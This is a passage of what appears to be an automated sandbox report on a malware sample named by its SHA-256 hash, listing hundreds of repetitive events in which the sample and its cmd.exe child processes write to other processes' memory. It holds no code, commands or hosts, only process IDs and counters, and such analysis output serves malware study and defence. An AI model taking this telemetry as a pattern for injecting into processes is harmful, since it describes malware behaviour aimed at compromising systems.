memory of 904 1292 cmd.exe 1175 PID 1292 wrote to memory of 904 1292 cmd.exe 1175 PID 1292 wrote to memory of 904 1292 cmd.exe 1175 PID 1292 wrote to memory of 904 1292 cmd.exe 1175 PID 1292 wrote to memory of 1512 1292 cmd.exe 1176 PID 1292 wrote to memory of 1512 1292 cmd.exe 1176 PID 1292 wrote to memory of 1512 1292 cmd.exe 1176 PID 1292 wrote to memory of 1512 1292 cmd.exe 1176 PID 1512 wrote to memory of 1840 1512 cmd.exe 1177 PID 1512 wrote to memory of 1840 1512 cmd.exe 1177 PID 1512 wrote to memory of 1840 1512 cmd.exe 1177 PID 1512 wrote to memory of 1840 1512 cmd.exe 1177 PID 1292 wrote to memory of 952 1292 cmd.exe 1178 PID 1292 wrote to memory of 952 1292 cmd.exe 1178 PID 1292 wrote to memory of 952 1292 cmd.exe 1178 PID 1292 wrote to memory of 952 1292 cmd.exe 1178 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1179 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1179 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1179 PID 672 wrote to memory of 204 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1179 PID 204 wrote to memory of 1376 204 cmd.exe 1181 PID 204 wrote to memory of 1376 204 cmd.exe 1181 PID 204 wrote to memory of 1376 204 cmd.exe 1181 PID 204 wrote to memory of 1376 204 cmd.exe 1181 PID 204 wrote to memory of 320 204 cmd.exe 1182 PID 204 wrote to memory of 320 204 cmd.exe 1182 PID 204 wrote to memory of 320 204 cmd.exe 1182 PID 204 wrote to memory of 320 204 cmd.exe 1182 PID 204 wrote to memory of 1488 204 cmd.exe 1183 PID 204 wrote to memory of 1488 204 cmd.exe 1183 PID 204 wrote to memory of 1488 204 cmd.exe 1183 PID 204 wrote to memory of 1488 204 cmd.exe 1183 PID 1488 wrote to memory of 1576 1488 cmd.exe 1184 PID 1488 wrote to memory of 1576 1488 cmd.exe 1184 PID 1488 wrote to memory of 1576 1488 cmd.exe 1184 PID 1488 wrote to memory of 1576 1488 cmd.exe 1184 PID 204 wrote to memory of 1216 204 cmd.exe 1185 PID 204 wrote to memory of 1216 204 cmd.exe 1185 PID 204 wrote to memory of 1216 204 cmd.exe 1185 PID 204 wrote to memory of 1216 204 cmd.exe 1185 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1186 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1186 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1186 PID 672 wrote to memory of 1968 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1186 PID 1968 wrote to memory of 1220 1968 cmd.exe 1188 PID 1968 wrote to memory of 1220 1968 cmd.exe 1188 PID 1968 wrote to memory of 1220 1968 cmd.exe 1188 PID 1968 wrote to memory of 1220 1968 cmd.exe 1188 PID 1968 wrote to memory of 1032 1968 cmd.exe 1189 PID 1968 wrote to memory of 1032 1968 cmd.exe 1189 PID 1968 wrote to memory of 1032 1968 cmd.exe 1189 PID 1968 wrote to memory of 1032 1968 cmd.exe 1189 PID 1968 wrote to memory of 1472 1968 cmd.exe 1190 PID 1968 wrote to memory of 1472 1968 cmd.exe 1190 PID 1968 wrote to memory of 1472 1968 cmd.exe 1190 PID 1968 wrote to memory of 1472 1968 cmd.exe 1190 PID 1472 wrote to memory of 1496 1472 cmd.exe 1191 PID 1472 wrote to memory of 1496 1472 cmd.exe 1191 PID 1472 wrote to memory of 1496 1472 cmd.exe 1191 PID 1472 wrote to memory of 1496 1472 cmd.exe 1191 PID 1968 wrote to memory of 980 1968 cmd.exe 1192 PID 1968 wrote to memory of 980 1968 cmd.exe 1192 PID 1968 wrote to memory of 980 1968 cmd.exe 1192 PID 1968 wrote to memory of 980 1968 cmd.exe 1192 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1193 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1193 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1193 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1193 PID 1080 wrote to memory of 1512 1080 cmd.exe 1195 PID 1080 wrote to memory of 1512 1080 cmd.exe 1195 PID 1080 wrote to memory of 1512 1080 cmd.exe 1195 PID 1080 wrote to memory of 1512 1080 cmd.exe 1195 PID 1080 wrote to memory of 1224 1080 cmd.exe 1196 PID 1080 wrote to memory of 1224 1080 cmd.exe 1196 PID 1080 wrote to memory of 1224 1080 cmd.exe 1196 PID 1080 wrote to memory of 1224 1080 cmd.exe 1196 PID 1080 wrote to memory of 1292 1080 cmd.exe 1197 PID 1080 wrote to memory of 1292 1080 cmd.exe 1197 PID 1080 wrote to memory of 1292 1080 cmd.exe 1197 PID 1080 wrote to memory of 1292 1080 cmd.exe 1197 PID 1292 wrote to memory of 1240 1292 cmd.exe 1198 PID 1292 wrote to memory of 1240 1292 cmd.exe 1198 PID 1292 wrote to memory of 1240 1292 cmd.exe 1198 PID 1292 wrote to memory of 1240 1292 cmd.exe 1198 PID 1080 wrote to memory of 1376 1080 cmd.exe 1199 PID 1080 wrote to memory of 1376 1080 cmd.exe 1199 PID 1080 wrote to memory of 1376 1080 cmd.exe 1199 PID 1080 wrote to memory of 1376 1080 cmd.exe 1199 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1200 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1200 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1200 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1200 PID 216 wrote to memory of 1488 216 cmd.exe 1202 PID 216 wrote to memory of 1488 216 cmd.exe 1202 PID 216 wrote to memory of 1488 216 cmd.exe 1202 PID 216 wrote to memory of 1488 216 cmd.exe 1202 PID 216 wrote to memory of 1216 216 cmd.exe 1203 PID 216 wrote to memory of 1216 216 cmd.exe 1203 PID 216 wrote to memory of 1216 216 cmd.exe 1203 PID 216 wrote to memory of 1216 216 cmd.exe 1203 PID 216 wrote to memory of 204 216 cmd.exe 1204 PID 216 wrote to memory of 204 216 cmd.exe 1204 PID 216 wrote to memory of 204 216 cmd.exe 1204 PID 216 wrote to memory of 204 216 cmd.exe 1204 PID 204 wrote to memory of 652 204 cmd.exe 1205 PID 204 wrote to memory of 652 204 cmd.exe 1205 PID 204 wrote to memory of 652 204 cmd.exe 1205 PID 204 wrote to memory of 652 204 cmd.exe 1205 PID 216 wrote to memory of 436 216 cmd.exe 1206 PID 216 wrote to memory of 436 216 cmd.exe 1206 PID 216 wrote to memory of 436 216 cmd.exe 1206 PID 216 wrote to memory of 436 216 cmd.exe 1206 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1207 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1207 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1207 PID 672 wrote to memory of 1032 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1207 PID 1032 wrote to memory of 360 1032 cmd.exe 1209 PID 1032 wrote to memory of 360 1032 cmd.exe 1209 PID 1032 wrote to memory of 360 1032 cmd.exe 1209 PID 1032 wrote to memory of 360 1032 cmd.exe 1209 PID 1032 wrote to memory of 904 1032 cmd.exe 1210 PID 1032 wrote to memory of 904 1032 cmd.exe 1210 PID 1032 wrote to memory of 904 1032 cmd.exe 1210 PID 1032 wrote to memory of 904 1032 cmd.exe 1210 PID 1032 wrote to memory of 1652 1032 cmd.exe 1211 PID 1032 wrote to memory of 1652 1032 cmd.exe 1211 PID 1032 wrote to memory of 1652 1032 cmd.exe 1211 PID 1032 wrote to memory of 1652 1032 cmd.exe 1211 PID 1652 wrote to memory of 1552 1652 cmd.exe 1212 PID 1652 wrote to memory of 1552 1652 cmd.exe 1212 PID 1652 wrote to memory of 1552 1652 cmd.exe 1212 PID 1652 wrote to memory of 1552 1652 cmd.exe 1212 PID 1032 wrote to memory of 1180 1032 cmd.exe 1213 PID 1032 wrote to memory of 1180 1032 cmd.exe 1213 PID 1032 wrote to memory of 1180 1032 cmd.exe 1213 PID 1032 wrote to memory of 1180 1032 cmd.exe 1213 PID 672 wrote to memory of 952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1214 PID 672 wrote to memory of 952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1214 PID 672 wrote to memory of 952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1214 PID 672 wrote to memory of 952 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1214 PID 952 wrote to memory of 1240 952 cmd.exe 1216 PID 952 wrote to memory of 1240 952 cmd.exe 1216 PID 952 wrote to memory of 1240 952 cmd.exe 1216 PID 952 wrote to memory of 1240 952 cmd.exe 1216 PID 952 wrote to memory of 2044 952 cmd.exe 1217 PID 952 wrote to memory of 2044 952 cmd.exe 1217 PID 952 wrote to memory of 2044 952 cmd.exe 1217 PID 952 wrote to memory of 2044 952 cmd.exe 1217 PID 952 wrote to memory of 1376 952 cmd.exe 1218 PID 952 wrote to memory of 1376 952 cmd.exe 1218 PID 952 wrote to memory of 1376 952 cmd.exe 1218 PID 952 wrote to memory of 1376 952 cmd.exe 1218 PID 1376 wrote to memory of 1080 1376 cmd.exe 1219 PID 1376 wrote to memory of 1080 1376 cmd.exe 1219 PID 1376 wrote to memory of 1080 1376 cmd.exe 1219 PID 1376 wrote to memory of 1080 1376 cmd.exe 1219 PID 952 wrote to memory of 1520 952 cmd.exe 1220 PID 952 wrote to memory of 1520 952 cmd.exe 1220 PID 952 wrote to memory of 1520 952 cmd.exe 1220 PID 952 wrote to memory of 1520 952 cmd.exe 1220 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1221 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1221 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1221 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1221 PID 744 wrote to memory of 652 744 cmd.exe 1223 PID 744 wrote to memory of 652 744 cmd.exe 1223 PID 744 wrote to memory of 652 744 cmd.exe 1223 PID 744 wrote to memory of 652 744 cmd.exe 1223 PID 744 wrote to memory of 592 744 cmd.exe 1224 PID 744 wrote to memory of 592 744 cmd.exe 1224 PID 744 wrote to memory of 592 744 cmd.exe 1224 PID 744 wrote to memory of 592 744 cmd.exe 1224 PID 744 wrote to memory of 436 744 cmd.exe 1225 PID 744 wrote to memory of 436 744 cmd.exe 1225 PID 744 wrote to memory of 436 744 cmd.exe 1225 PID 744 wrote to memory of 436 744 cmd.exe 1225 PID 436 wrote to memory of 216 436 cmd.exe 1226 PID 436 wrote to memory of 216 436 cmd.exe 1226 PID 436 wrote to memory of 216 436 cmd.exe 1226 PID 436 wrote to memory of 216 436 cmd.exe 1226 PID 744 wrote to memory of 760 744 cmd.exe 1227 PID 744 wrote to memory of 760 744 cmd.exe 1227 PID 744 wrote to memory of 760 744 cmd.exe 1227 PID 744 wrote to memory of 760 744 cmd.exe 1227 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1228 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1228 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1228 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1228 PID 904 wrote to memory of 1552 904 cmd.exe 1230 PID 904 wrote to memory of 1552 904 cmd.exe 1230 PID 904 wrote to memory of 1552 904 cmd.exe 1230 PID 904 wrote to memory of 1552 904 cmd.exe 1230 PID 904 wrote to memory of 220 904 cmd.exe 1231 PID 904 wrote to memory of 220 904 cmd.exe 1231 PID 904 wrote to memory of 220 904 cmd.exe 1231 PID 904 wrote to memory of 220 904 cmd.exe 1231 PID 904 wrote to memory of 1180 904 cmd.exe 1232 PID 904 wrote to memory of 1180 904 cmd.exe 1232 PID 904 wrote to memory of 1180 904 cmd.exe 1232 PID 904 wrote to memory of 1180 904 cmd.exe 1232 PID 1180 wrote to memory of 1032 1180 cmd.exe 1233 PID 1180 wrote to memory of 1032 1180 cmd.exe 1233 PID 1180 wrote to memory of 1032 1180 cmd.exe 1233 PID 1180 wrote to memory of 1032 1180 cmd.exe 1233 PID 904 wrote to memory of 1292 904 cmd.exe 1234 PID 904 wrote to memory of 1292 904 cmd.exe 1234 PID 904 wrote to memory of 1292 904 cmd.exe 1234 PID 904 wrote to memory of 1292 904 cmd.exe 1234 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1235 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1235 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1235 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1235 PID 320 wrote to memory of 1080 320 cmd.exe 1237 PID 320 wrote to memory of 1080 320 cmd.exe 1237 PID 320 wrote to memory of 1080 320 cmd.exe 1237 PID 320 wrote to memory of 1080 320 cmd.exe 1237 PID 320 wrote to memory of 1488 320 cmd.exe 1238 PID 320 wrote to memory of 1488 320 cmd.exe 1238 PID 320 wrote to memory of 1488 320 cmd.exe 1238 PID 320 wrote to memory of 1488 320 cmd.exe 1238 PID 320 wrote to memory of 224 320 cmd.exe 1239 PID 320 wrote to memory of 224 320 cmd.exe 1239 PID 320 wrote to memory of 224 320 cmd.exe 1239 PID 320 wrote to memory of 224 320 cmd.exe 1239 PID 224 wrote to memory of 1224 224 cmd.exe 1240 PID 224 wrote to memory of 1224 224 cmd.exe 1240 PID 224 wrote to memory of 1224 224 cmd.exe 1240 PID 224 wrote to memory of 1224 224 cmd.exe 1240 PID 320 wrote to memory of 1368 320 cmd.exe 1241 PID 320 wrote to memory of 1368 320 cmd.exe 1241 PID 320 wrote to memory of 1368 320 cmd.exe 1241 PID 320 wrote to memory of 1368 320 cmd.exe 1241 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1242 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1242 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1242 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1242 PID 984 wrote to memory of 232 984 cmd.exe 1244 PID 984 wrote to memory of 232 984 cmd.exe 1244 PID 984 wrote to memory of 232 984 cmd.exe 1244 PID 984 wrote to memory of 232 984 cmd.exe 1244 PID 984 wrote to memory of 676 984 cmd.exe 1245 PID 984 wrote to memory of 676 984 cmd.exe 1245 PID 984 wrote to memory of 676 984 cmd.exe 1245 PID 984 wrote to memory of 676 984 cmd.exe 1245 PID 984 wrote to memory of 360 984 cmd.exe 1246 PID 984 wrote to memory of 360 984 cmd.exe 1246 PID 984 wrote to memory of 360 984 cmd.exe 1246 PID 984 wrote to memory of 360 984 cmd.exe 1246 PID 360 wrote to memory of 760 360 cmd.exe 1247 PID 360 wrote to memory of 760 360 cmd.exe 1247 PID 360 wrote to memory of 760 360 cmd.exe 1247 PID 360 wrote to memory of 760 360 cmd.exe 1247 PID 984 wrote to memory of 744 984 cmd.exe 1248 PID 984 wrote to memory of 744 984 cmd.exe 1248 PID 984 wrote to memory of 744 984 cmd.exe 1248 PID 984 wrote to memory of 744 984 cmd.exe 1248 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1249 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1249 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1249 PID 672 wrote to memory of 280 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1249 PID 280 wrote to memory of 1800 280 cmd.exe 1251 PID 280 wrote to memory of 1800 280 cmd.exe 1251 PID 280 wrote to memory of 1800 280 cmd.exe 1251 PID 280 wrote to memory of 1800 280 cmd.exe 1251 PID 280 wrote to memory of 700 280 cmd.exe 1252 PID 280 wrote to memory of 700 280 cmd.exe 1252 PID 280 wrote to memory of 700 280 cmd.exe 1252 PID 280 wrote to memory of 700 280 cmd.exe 1252 PID 280 wrote to memory of 1836 280 cmd.exe 1253 PID 280 wrote to memory of 1836 280 cmd.exe 1253 PID 280 wrote to memory of 1836 280 cmd.exe 1253 PID 280 wrote to memory of 1836 280 cmd.exe 1253 PID 1836 wrote to memory of 1292 1836 cmd.exe 1254 PID 1836 wrote to memory of 1292 1836 cmd.exe 1254 PID 1836 wrote to memory of 1292 1836 cmd.exe 1254 PID 1836 wrote to memory of 1292 1836 cmd.exe 1254 PID 280 wrote to memory of 544 280 cmd.exe 1255 PID 280 wrote to memory of 544 280 cmd.exe 1255 PID 280 wrote to memory of 544 280 cmd.exe 1255 PID 280 wrote to memory of 544 280 cmd.exe 1255 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1256 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1256 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1256 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1256 PID 1840 wrote to memory of 1956 1840 cmd.exe 1258 PID 1840 wrote to memory of 1956 1840 cmd.exe 1258 PID 1840 wrote to memory of 1956 1840 cmd.exe 1258 PID 1840 wrote to memory of 1956 1840 cmd.exe 1258 PID 1840 wrote to memory of 1520 1840 cmd.exe 1259 PID 1840 wrote to memory of 1520 1840 cmd.exe 1259 PID 1840 wrote to memory of 1520 1840 cmd.exe 1259 PID 1840 wrote to memory of 1520 1840 cmd.exe 1259 PID 1840 wrote to memory of 204 1840 cmd.exe 1260 PID 1840 wrote to memory of 204 1840 cmd.exe 1260 PID 1840 wrote to memory of 204 1840 cmd.exe 1260 PID 1840 wrote to memory of 204 1840 cmd.exe 1260 PID 204 wrote to memory of 1368 204 cmd.exe 1261 PID 204 wrote to memory of 1368 204 cmd.exe 1261 PID 204 wrote to memory of 1368 204 cmd.exe 1261 PID 204 wrote to memory of 1368 204 cmd.exe 1261 PID 1840 wrote to memory of 1244 1840 cmd.exe 1262 PID 1840 wrote to memory of 1244 1840 cmd.exe 1262 PID 1840 wrote to memory of 1244 1840 cmd.exe 1262 PID 1840 wrote to memory of 1244 1840 cmd.exe 1262 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1263 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1263 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1263 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1263 PID 216 wrote to memory of 1820 216 cmd.exe 1265 PID 216 wrote to memory of 1820 216 cmd.exe 1265 PID 216 wrote to memory of 1820 216 cmd.exe 1265 PID 216 wrote to memory of 1820 216 cmd.exe 1265 PID 216 wrote to memory of 760 216 cmd.exe 1266 PID 216 wrote to memory of 760 216 cmd.exe 1266 PID 216 wrote to memory of 760 216 cmd.exe 1266 PID 216 wrote to memory of 760 216 cmd.exe 1266 PID 216 wrote to memory of 1752 216 cmd.exe 1267 PID 216 wrote to memory of 1752 216 cmd.exe 1267 PID 216 wrote to memory of 1752 216 cmd.exe 1267 PID 216 wrote to memory of 1752 216 cmd.exe 1267 PID 1752 wrote to memory of 1068 1752 cmd.exe 1268 PID 1752 wrote to memory of 1068 1752 cmd.exe 1268 PID 1752 wrote to memory of 1068 1752 cmd.exe 1268 PID 1752 wrote to memory of 1068 1752 cmd.exe 1268 PID 216 wrote to memory of 1812 216 cmd.exe 1269 PID 216 wrote to memory of 1812 216 cmd.exe 1269 PID 216 wrote to memory of 1812 216 cmd.exe 1269 PID 216 wrote to memory of 1812 216 cmd.exe 1269 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1270 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1270 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1270 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1270 PID 896 wrote to memory of 980 896 cmd.exe 1272 PID 896 wrote to memory of 980 896 cmd.exe 1272 PID 896 wrote to memory of 980 896 cmd.exe 1272 PID 896 wrote to memory of 980 896 cmd.exe 1272 PID 896 wrote to memory of 1292 896 cmd.exe 1273 PID 896 wrote to memory of 1292 896 cmd.exe 1273 PID 896 wrote to memory of 1292 896 cmd.exe 1273 PID 896 wrote to memory of 1292 896 cmd.exe 1273 PID 896 wrote to memory of 864 896 cmd.exe 1274 PID 896 wrote to memory of 864 896 cmd.exe 1274 PID 896 wrote to memory of 864 896 cmd.exe 1274 PID 896 wrote to memory of 864 896 cmd.exe 1274 PID 864 wrote to memory of 1896 864 cmd.exe 1275 PID 864 wrote to memory of 1896 864 cmd.exe 1275 PID 864 wrote to memory of 1896 864 cmd.exe 1275 PID 864 wrote to memory of 1896 864 cmd.exe 1275 PID 896 wrote to memory of 1644 896 cmd.exe 1276 PID 896 wrote to memory of 1644 896 cmd.exe 1276 PID 896 wrote to memory of 1644 896 cmd.exe 1276 PID 896 wrote to memory of 1644 896 cmd.exe 1276 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1277 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1277 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1277 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1277 PID 1224 wrote to memory of 2044 1224 cmd.exe 1279 PID 1224 wrote to memory of 2044 1224 cmd.exe 1279 PID 1224 wrote to memory of 2044 1224 cmd.exe 1279 PID 1224 wrote to memory of 2044 1224 cmd.exe 1279 PID 1224 wrote to memory of 1368 1224 cmd.exe 1280 PID 1224 wrote to memory of 1368 1224 cmd.exe 1280 PID 1224 wrote to memory of 1368 1224 cmd.exe 1280 PID 1224 wrote to memory of 1368 1224 cmd.exe 1280 PID 1224 wrote to memory of 592 1224 cmd.exe 1281 PID 1224 wrote to memory of 592 1224 cmd.exe 1281 PID 1224 wrote to memory of 592 1224 cmd.exe 1281 PID 1224 wrote to memory of 592 1224 cmd.exe 1281 PID 592 wrote to memory of 1220 592 cmd.exe 1282 PID 592 wrote to memory of 1220 592 cmd.exe 1282 PID 592 wrote to memory of 1220 592 cmd.exe 1282 PID 592 wrote to memory of 1220 592 cmd.exe 1282 PID 1224 wrote to memory of 1960 1224 cmd.exe 1283 PID 1224 wrote to memory of 1960 1224 cmd.exe 1283 PID 1224 wrote to memory of 1960 1224 cmd.exe 1283 PID 1224 wrote to memory of 1960 1224 cmd.exe 1283 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1284 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1284 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1284 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1284 PID 236 wrote to memory of 548 236 cmd.exe 1286 PID 236 wrote to memory of 548 236 cmd.exe 1286 PID 236 wrote to memory of 548 236 cmd.exe 1286 PID 236 wrote to memory of 548 236 cmd.exe 1286 PID 236 wrote to memory of 1068 236 cmd.exe 1287 PID 236 wrote to memory of 1068 236 cmd.exe 1287 PID 236 wrote to memory of 1068 236 cmd.exe 1287 PID 236 wrote to memory of 1068 236 cmd.exe 1287 PID 236 wrote to memory of 524 236 cmd.exe 1288 PID 236 wrote to memory of 524 236 cmd.exe 1288 PID 236 wrote to memory of 524 236 cmd.exe 1288 PID 236 wrote to memory of 524 236 cmd.exe 1288 PID 524 wrote to memory of 1064 524 cmd.exe 1289 PID 524 wrote to memory of 1064 524 cmd.exe 1289 PID 524 wrote to memory of 1064 524 cmd.exe 1289 PID 524 wrote to memory of 1064 524 cmd.exe 1289 PID 236 wrote to memory of 1572 236 cmd.exe 1290 PID 236 wrote to memory of 1572 236 cmd.exe 1290 PID 236 wrote to memory of 1572 236 cmd.exe 1290 PID 236 wrote to memory of 1572 236 cmd.exe 1290 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1291 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1291 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1291 PID 672 wrote to memory of 1156 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1291 PID 1156 wrote to memory of 992 1156 cmd.exe 1293 PID 1156 wrote to memory of 992 1156 cmd.exe 1293 PID 1156 wrote to memory of 992 1156 cmd.exe 1293 PID 1156 wrote to memory of 992 1156 cmd.exe 1293 PID 1156 wrote to memory of 1896 1156 cmd.exe 1294 PID 1156 wrote to memory of 1896 1156 cmd.exe 1294 PID 1156 wrote to memory of 1896 1156 cmd.exe 1294 PID 1156 wrote to memory of 1896 1156 cmd.exe 1294 PID 1156 wrote to memory of 1488 1156 cmd.exe 1295 PID 1156 wrote to memory of 1488 1156 cmd.exe 1295 PID 1156 wrote to memory of 1488 1156 cmd.exe 1295 PID 1156 wrote to memory of 1488 1156 cmd.exe 1295 PID 1488 wrote to memory of 1644 1488 cmd.exe 1296 PID 1488 wrote to memory of 1644 1488 cmd.exe 1296 PID 1488 wrote to memory of 1644 1488 cmd.exe 1296 PID 1488 wrote to memory of 1644 1488 cmd.exe 1296 PID 1156 wrote to memory of 1240 1156 cmd.exe 1297 PID 1156 wrote to memory of 1240 1156 cmd.exe 1297 PID 1156 wrote to memory of 1240 1156 cmd.exe 1297 PID 1156 wrote to memory of 1240 1156 cmd.exe 1297 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1298 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1298 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1298 PID 672 wrote to memory of 212 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1298 PID 212 wrote to memory of 1080 212 cmd.exe 1300 PID 212 wrote to memory of 1080 212 cmd.exe 1300 PID 212 wrote to memory of 1080 212 cmd.exe 1300 PID 212 wrote to memory of 1080 212 cmd.exe 1300 PID 212 wrote to memory of 752 212 cmd.exe 1301 PID 212 wrote to memory of 752 212 cmd.exe 1301 PID 212 wrote to memory of 752 212 cmd.exe 1301 PID 212 wrote to memory of 752 212 cmd.exe 1301 PID 212 wrote to memory of 1372 212 cmd.exe 1302 PID 212 wrote to memory of 1372 212 cmd.exe 1302 PID 212 wrote to memory of 1372 212 cmd.exe 1302 PID 212 wrote to memory of 1372 212 cmd.exe 1302 PID 1372 wrote to memory of 1056 1372 cmd.exe 1303 PID 1372 wrote to memory of 1056 1372 cmd.exe 1303 PID 1372 wrote to memory of 1056 1372 cmd.exe 1303 PID 1372 wrote to memory of 1056 1372 cmd.exe 1303 PID 212 wrote to memory of 1820 212 cmd.exe 1304 PID 212 wrote to memory of 1820 212 cmd.exe 1304 PID 212 wrote to memory of 1820 212 cmd.exe 1304 PID 212 wrote to memory of 1820 212 cmd.exe 1304 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1305 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1305 PID 672 wrote to memory of 548 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1305 PID 672 